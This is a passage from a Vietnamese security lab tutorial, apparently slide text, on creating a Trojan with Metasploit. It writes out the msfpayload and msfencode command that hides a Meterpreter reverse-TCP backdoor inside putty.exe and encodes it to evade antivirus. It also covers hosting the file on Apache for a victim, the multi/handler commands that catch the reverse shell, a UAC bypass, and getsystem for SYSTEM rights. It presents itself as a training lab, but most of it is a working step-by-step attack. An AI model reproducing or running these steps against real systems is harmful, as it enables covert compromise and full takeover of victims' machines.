  • 100. - Sauđó tathử uploadchươngtrìnhlênvirustotalvàkiểmtra kết quảscan ta đượctỷlệ7/42AV nhậnđâylàvirus
  • 101. Bài :TạoTrojan bằng Metasploit 1. Mục đích bài lab - Mụcđíchbàilab: sử dụngcông cụ msfpayloadvà msfencodecó trong Metasploit đểtạo rafileTrojan. Ta chuẩn bịfilethựcthiexe nào đó. Vídụnhư ở đâytasử dụng chươngtrìnhputty.exe - Sử dụng msfpayloadđểtạo backdoor. Sauđó tasử dụng msfencodeđểby pass antivirus - Sơđồ bài lab 234 Attacker 192.168.1.0/24 Victim 2. Cácbướcthựchiện - Đầutiênta copyfile putty.exevào trongmáy backtrack5. Tathựchiệncâu lệnhbên dưới với giátrịLHOST là IP củaattacker,LPORTlà portmà máy attackersử dụngđểquảnlý kếtnối. “./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.234LPORT=4455R | ./msfencode -e x86/shikata_ga_nai-c 3-t exe -x /root/Desktop/putty.exe-o /root/Desktop/putty_backdoor.exe“
  • 102. - Saukhi tạo xong backdoor bướckếtiếplà làmsao gửifile backdoor nàyđến victim. Ví dụở đâytastart dịchvụ apache2và copyfile nàyvào trongfolder /var/www - Khởi động dịchvụapache2và kiểmtra downloadfile
  • 103. - Saukhitađã chuẩnbịxong mọi thứ tasửdụngtínhnăng “exploit/multi/handler” đểquảnlý cáckết nối từ máyvictimđếnmáy attacker. msf>use exploit/multi/handler msf exploit(handler)>set payload windows/meterpreter/reverse_tcp payload=>windows/meterpreter/reverse_tcp msf exploit(handler)>set LHOST192.168.1.234
  • 104. msf exploit(handler)>set LPORT4455 LPORT=>4455 msf exploit(handler)>exploit–j - Victimthựcthi fileputty_backdoor.exethì tại máyattacker sẽcó được1 kết nốiđiềukhiển. - Tiếptục ta nhậpvào câulệnh “run post/windows/escalate/bypassuac” thì metasploit sẽtạo ra1sessions mới. - Ta kết nối vào sessionssố 5bằng cách nhậpvào câulệnh“background” và “sessions–l” và“sessions –i 5”
  • 105. - Thông qua kếtnối mới ta nhậpvào các câulệnhgetprivs,getsystem,getuidđể ta có quyền systemvới máyvictim.